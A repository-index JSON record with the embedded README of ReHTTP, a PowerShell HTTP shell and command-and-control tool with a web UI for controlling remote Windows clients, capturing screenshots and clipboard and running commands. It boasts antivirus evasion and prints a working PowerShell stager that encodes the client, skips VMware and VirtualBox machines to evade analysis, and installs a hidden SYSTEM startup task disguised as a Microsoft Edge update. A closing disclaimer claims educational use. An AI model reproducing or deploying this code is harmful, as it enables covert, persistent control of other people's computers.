{"id":27966137,"url":"https://github.com/jxroot/rehttp","last_synced_at":"2025-05-07T20:16:56.855Z","repository":{"id":189574283,"uuid":"637898548","full_name":"jxroot/ReHTTP","owner":"jxroot","description":" Simple Powershell Http shell With WEB UI ","archived":false,"fork":false,"pushed_at":"2025-03-28T22:58:57.000Z","size":961,"stargazers_count":70,"open_issues_count":0,"forks_count":8,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-05-07T20:16:52.566Z","etag":null,"topics":["backdoor","c2","exploitation-framework","hack","javascript","kali-linux","penetration-testing","pentest","pentesting","php","post-exploitation","powershell","rat","red-team","termux"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jxroot.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-05-08T16:39:19.000Z","updated_at":"2025-03-28T22:59:00.000Z","dependencies_parsed_at":"2024-04-13T09:40:58.712Z","dependency_job_id":"02fab3ae-4d97-4cf7-ad70-741da715bb79","html_url":"https://github.com/jxroot/ReHTTP","commit_stats":null,"previous_names":["jxroot/rehttp"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jxroot%2FReHTTP","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jxroot%2FReHTTP/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jxroot%2FReHTTP/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jxroot%2FReHTTP/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jxroot","download_url":"https://codeload.github.com/jxroot/ReHTTP/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":252949249,"owners_count":21830154,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","c2","exploitation-framework","hack","javascript","kali-linux","penetration-testing","pentest","pentesting","php","post-exploitation","powershell","rat","red-team","termux"],"created_at":"2025-05-07T20:16:56.357Z","updated_at":"2025-05-07T20:16:56.844Z","avatar_url":"https://github.com/jxroot.png","language":"PHP","readme":"\n\n\n\n\n﻿\n\u003ch3 align=\"center\"\u003e\u003cimg src=\"https://s28.picofile.com/file/8463031418/favicon.png\" alt=\"logo\" height=\"250px\"\u003e\u003c/h3\u003e\n\u003cp align=\"center\"\u003e\n    \u003cb\u003eReHTTP\u003c/b\u003e\u003cbr\u003e\n    \u003c/p\u003e\n\u003chr\u003e\n\u003cp align=\"center\"\u003e\n  \u003cb\u003e Simple Powershell Http shell With WEB UI \u003c/b\u003e\n    \u003c/p\u003e\n\u003cp align=\"center\"\u003e\n  \u003ca href=\"https://php.net\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/php-8.0.7-green\" alt=\"php\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"#\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/platform-Windows-red\"\u003e\n  \u003c/a\u003e\n    \u003ca href=\"https://www.codefactor.io/repository/github/jxroot/ReHTTP\"\u003e  \u003cimg src=\"https://www.codefactor.io/repository/github/jxroot/ReHTTP/badge\" alt=\"CodeFactor\" /\u003e \u003c/a\u003e\n   \n\n   \n\n  \n\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://s28.picofile.com/file/8463024792/main.png\" alt=\"enter image description here\"\u003e\u003c/p\u003e\n\u003ch2 id=\"shell\"\u003e🤟 Main\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003eClient list\u003c/li\u003e\n\u003cli\u003eSystem Info\u003c/li\u003e\n\u003cli\u003eClient Status\u003c/li\u003e\n\u003cli\u003eSet Label\u003c/li\u003e\n\u003cli\u003eRemove Client\u003c/li\u003e\n\u003cli\u003eModule\u003c/li\u003e\n\u003cli\u003eVariable\u003c/li\u003e\n\u003cli\u003eEvent\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"shell\"\u003e💎 Shell\u003c/h2\u003e\n\u003cp\u003e\u003cimg src=\"https://s29.picofile.com/file/8463025868/shell.png\" alt=\"shell tab demo\"\u003e\n\u003cbr\u003e\u003c/p\u003e\n\u003cb\u003eRun Powershell Command And You Can Add Command in Scheduled  \u003c/b\u003e\n\u003cul\u003e\n\u003cli\u003eShell Access\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"Module\"\u003e📟 Module\u003c/h2\u003e\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://s29.picofile.com/file/8463025900/modules.png\" alt=\"enter image description here\"\u003e\u003c/p\u003e\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://s29.picofile.com/file/8463026284/screenshot.png\" alt=\"enter image description here\"\u003e\u003c/p\u003e\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://s29.picofile.com/file/8463026126/edi.png\" alt=\"enter image description here\"\u003e\u003c/p\u003e\n\u003cb\u003eRun Powershell Code as Function Or Module \u003c/b\u003e\u003c/p\u003e\n\u003cpre\u003enote : for use template edit $SERVER_URL in Code\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eAdd Module\u003c/li\u003e\n\u003cli\u003eEdit Module\u003c/li\u003e\n\u003cli\u003eDelete Module\u003c/li\u003e\n--------------templates-----------------------\n\u003cli\u003eBeep Sound\u003c/li\u003e\n\u003cli\u003eMessageBox\u003c/li\u003e\n\u003cli\u003eDownload Current Background\u003c/li\u003e\n\u003cli\u003eGet System IdleTime\u003c/li\u003e\n\u003cli\u003eGet System LastInput\u003c/li\u003e\n\u003cli\u003eGet Public IP\u003c/li\u003e\n\u003cli\u003eGet-Clipboard\u003c/li\u003e\n\u003cli\u003eSet-Clipboard\u003c/li\u003e\n\u003cli\u003eScreenshot\u003c/li\u003e\n\u003cli\u003eOpenLink\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"Module\"\u003e🧮 Variable\u003c/h2\u003e\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://s29.picofile.com/file/8463026176/variable.png\" alt=\"enter image description here\"\u003e\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://s29.picofile.com/file/8463026184/variables.png\" alt=\"enter image description here\"\u003e\u003c/p\u003e\n\u003cb\u003eRun PHP Code as Variable And Use In PowerShell Script\u003c/b\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd Variable\u003c/li\u003e\n\u003cli\u003eEdit Variable\u003c/li\u003e\n\u003cli\u003eDelete Variable\u003c/li\u003e\n--------------templates-----------------------\n\u003cli\u003erandom\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"History\"\u003e📜 History\u003c/h2\u003e\n\u003cp\u003e\u003cimg src=\"https://s29.picofile.com/file/8463026276/history.png\" alt=\"enter image description here\"\u003e\u003c/p\u003e\n\u003cb\u003eif Your Client Break You Can Remove Last Command /:\u003c/b\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eShow Command And Module\u003c/li\u003e\n\u003cli\u003eRemove Command\u003c/li\u003e\n\u003cli\u003eRe Execute Command\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"History\"\u003e🪄 Event\u003c/h2\u003e\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://s29.picofile.com/file/8463026318/event.png\" alt=\"enter image description here\"\u003e\u003c/p\u003e\n\u003cb\u003eRun Custom Command \u003c/b\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFirst Connection ( Init )\u003c/li\u003e\n\u003cli\u003eEvery Connection ( UP )\u003c/li\u003e\n\u003cli\u003eDestroy ( Destroy )\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"dependency\"\u003e🛠 Dependency\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePHP 5.4 And Higher\u003c/li\u003e\n\u003cli\u003eMysql\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"Antivirus\"\u003e🦠 Antivirus\u003c/h2\u003e\n\u003cp\u003e\u003cimg src=\"https://s29.picofile.com/file/8463026484/fD0Idrg5jVZx.pnل\" alt=\"enter image description here\"\u003e\u003c/p\u003e\n\u003cb\u003eFUD Scan Time + Run Time :)\u003c/b\u003e\n\u003ch2 id=\"installation-and-usage\"\u003e💿 Installation And Usage\u003c/h2\u003e\n\u003cp\u003e1- Edit $SERVER_URL in Client.ps1\u003c/p\u003e\n\u003cp\u003e2- Run ps1 script\u003c/p\u003e\n\u003cp\u003e3- Create Database \u003c/p\u003e\n\u003cpre class=\" language-bash\"\u003e\u003ccode class=\"prism  language-bash\"\u003e\u003cspan class=\"token function\"\u003egit\u003c/span\u003e clone https://github.com/jxroot/ReHTTP.git\n\u003cspan class=\"token function\"\u003ecd\u003c/span\u003e ReHTTP/Server/\nphp -S 127.0.0.1:8000 \n\u003c/code\u003e\u003c/pre\u003e\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://s29.picofile.com/file/8463060076/setup.png\" alt=\"enter image description here\"\u003e\u003c/p\u003e\nTriger Example For Client\n\u003cpre class=\" language-bash\"\u003e\u003ccode class=\"prism  language-bash\"\u003e\n$s = Get-Content client.ps1 | Out-String\n$j = [PSCustomObject]@{\n  \"Script\" = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($s))\n} | ConvertTo-Json -Compress\n$oneline = \"[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(('\" + $j + \"' | ConvertFrom-Json).Script)) | iex\"\n$c = [convert]::ToBase64String([System.Text.encoding]::Unicode.GetBytes($oneline))\n$template = '\n$VM=get-wmiobject win32_computersystem |select -ExpandProperty Model\nif(($VM -NotLike \"*VMware*\") -and ($VM -NotLike \"VirtualBox\")){\n$action = New-ScheduledTaskAction -Execute \"powershell.exe\" -Argument \" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Encoded  '+ $c + '\" \n$trigger = New-ScheduledTaskTrigger -AtStartup \n$settings = New-ScheduledTaskSettingsSet -Hidden\n$user = New-ScheduledTaskPrincipal -UserId \"SYSTEM\" -RunLevel Highest  \nRegister-ScheduledTask -TaskName \"MicrosoftEdgeUpdateTaskMachineUAS\" -TaskPath \"\\\"  -Action $action -Settings $settings -Trigger $trigger -Principal $user\nStart-ScheduledTask -TaskName \"MicrosoftEdgeUpdateTaskMachineUAS\" \n}\n\n'\nNew-Item -Path . -Name evil.ps1 -Value $template -Force\n\n\u003c/code\u003e\u003c/pre\u003e\n\u003ch2 id=\"operating-systems-tested\"\u003e💻 Operating Systems Tested\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eWindows 7\u003c/li\u003e\n\u003cli\u003eWindows 10\u003c/li\u003e\n\u003cli\u003eWindows 11\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"youtube-tutorials\"\u003e📹 YouTube Tutorials\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://youtu.be/U9xNnd3XtMc\"\u003eHow Install And Usage ReHTTP\u003c/a\u003e\u003c/p\u003e\n\n\u003ch2 id=\"next-update\"\u003e🔱 Next Update\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix  ui bugs\u003c/li\u003e\n\u003cli\u003eclean code \u003c/li\u003e\n\u003cli\u003eadd event for distroy\u003c/li\u003e\n\u003cli\u003eadd multi exec command for client\u003c/li\u003e\n\u003cli\u003eupload and  download module\u003c/li\u003e\n\u003cli\u003easync command\u003c/li\u003e\n\u003cli\u003escheduled task ( Date )\u003c/li\u003e\n\u003cli\u003ebackground task \u003c/li\u003e\n\u003cli\u003eui for system information and manage like hiorbit\u003c/li\u003e\n\u003cli\u003eadd file manager \u003c/li\u003e\n\u003cli\u003esecurity (xss,csrf,rce,login page,...)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"contact\"\u003e📧 Contact\u003c/h2\u003e\n\u003cp \u003e\n\u003ca href=\"https://t.me/amajax\"\u003e\u003cimg title=\"Telegram\" src=\"https://img.shields.io/badge/Telegram-black?style=for-the-badge\u0026logo=Telegram\"\u003e\u003c/a\u003e\n\u003ca href=\"https://www.youtube.com/channel/UC0-QcOXgzRgSfcE3zerwu9w/?sub_confirmation=1\"\u003e\u003cimg title=\"Youtube\" src=\"https://img.shields.io/badge/Youtube-red?style=for-the-badge\u0026logo=Youtube\"\u003e\u003c/a\u003e\n\u003ca href=\"https://www.instagram.com/sectoolfa\"\u003e\u003cimg title=\"Instagram\" src=\"https://img.shields.io/badge/Instagram-white?style=for-the-badge\u0026logo=Instagram\"\u003e\u003c/a\u003e\n\n## ⚠️ Legal \u0026 Ethical Disclaimer\n\n🚨 This tool is developed strictly for educational and authorized security testing purposes only.\n\n🔬 It is intended to help cybersecurity professionals, researchers, and enthusiasts understand post-exploitation, red teaming, and detection techniques in lab or controlled environments.\n\n❌ Do NOT use this tool on any system or network without explicit permission. Unauthorized use may be illegal and unethical.\n\n🛡 The author takes no responsibility for any misuse or damage caused by this project.\n\n---\n\n\u003e Always hack responsibly. 💻🔐\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjxroot%2Frehttp","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fjxroot%2Frehttp","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjxroot%2Frehttp/lists"}